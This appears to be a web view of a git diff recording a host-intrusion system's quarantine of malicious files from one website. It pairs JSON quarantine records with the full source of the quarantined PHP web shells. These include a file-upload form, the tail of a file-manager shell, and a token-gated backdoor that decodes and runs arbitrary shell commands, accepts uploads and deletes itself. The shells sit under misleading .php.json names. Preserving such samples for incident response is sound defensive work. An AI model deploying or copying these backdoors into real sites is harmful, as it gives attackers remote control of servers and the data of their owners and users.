$ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0004) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0002) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-'));
|
||||
|
||||
return $ingfo;
|
||||
}
|
||||
?>
|
||||
</body>
|
||||
</html>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "5307",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:logs/yhajxaav.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/logs/yhajxaav.php.json)",
|
||||
"original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783346951,
|
||||
"size": 10657,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "logs/yhajxaav.php.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
@ -0,0 +1,6 @@
|
||||
<html><body><form method=post enctype=multipart/form-data>
|
||||
<input type=file name=f><input type=submit value=Upload></form><pre><?php
|
||||
if(isset($_FILES['f'])){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);
|
||||
echo$_FILES['f']['name'].' OK';}
|
||||
echo 'UPLOAD_OKE';
|
||||
?></pre></body></html>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "7191",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:media/50nnp2o4xt.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/media/50nnp2o4xt.php.json)",
|
||||
"original_sha256": "ad4e4ea904d90384d07ccb43d3f371bb03a5a647a997b991aeb4a8df6bc6dfe1",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1784278956,
|
||||
"size": 298,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "media/50nnp2o4xt.php.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
10
var/www/hosting/archlinexp.eu/www/media/c_03e0fd55.php.json
Normal file
10
var/www/hosting/archlinexp.eu/www/media/c_03e0fd55.php.json
Normal file
@ -0,0 +1,10 @@
|
||||
<?php
|
||||
error_reporting(0);$t='f0c1cfa275d47875';$o=false;
|
||||
if(isset($_GET['t'])&&$_GET['t']===$t)$o=true;
|
||||
if(isset($_POST['t'])&&$_POST['t']===$t)$o=true;
|
||||
if(!$o){http_response_code(404);die();}
|
||||
if(isset($_GET['c'])){{$c=base64_decode(str_replace([' ','-','_'],['+','+','/'],$_GET['c']));echo'C|';if(function_exists('system'))system($c.' 2>&1');elseif(function_exists('passthru'))passthru($c.' 2>&1');elseif(function_exists('exec'))echo exec($c.' 2>&1');elseif(function_exists('shell_exec'))echo shell_exec($c.' 2>&1');echo'|E';die();}}
|
||||
if(isset($_FILES['f'])){{$n=basename($_FILES['f']['name']);move_uploaded_file($_FILES['f']['tmp_name'],dirname(__FILE__).'/'.$n);echo'U:'.$n;die();}}
|
||||
if(isset($_GET['d'])){{@unlink(__FILE__);die('D');}}
|
||||
echo'S|'.php_uname();
|
||||
?>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "4984",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:media/c_03e0fd55.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/media/c_03e0fd55.php.json)",
|
||||
"original_sha256": "65fb4317f685e623919513c4acd4adc25b75abfa7894caa022160557b6c90c2d",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783194679,
|
||||
"size": 762,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "media/c_03e0fd55.php.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue
Block a user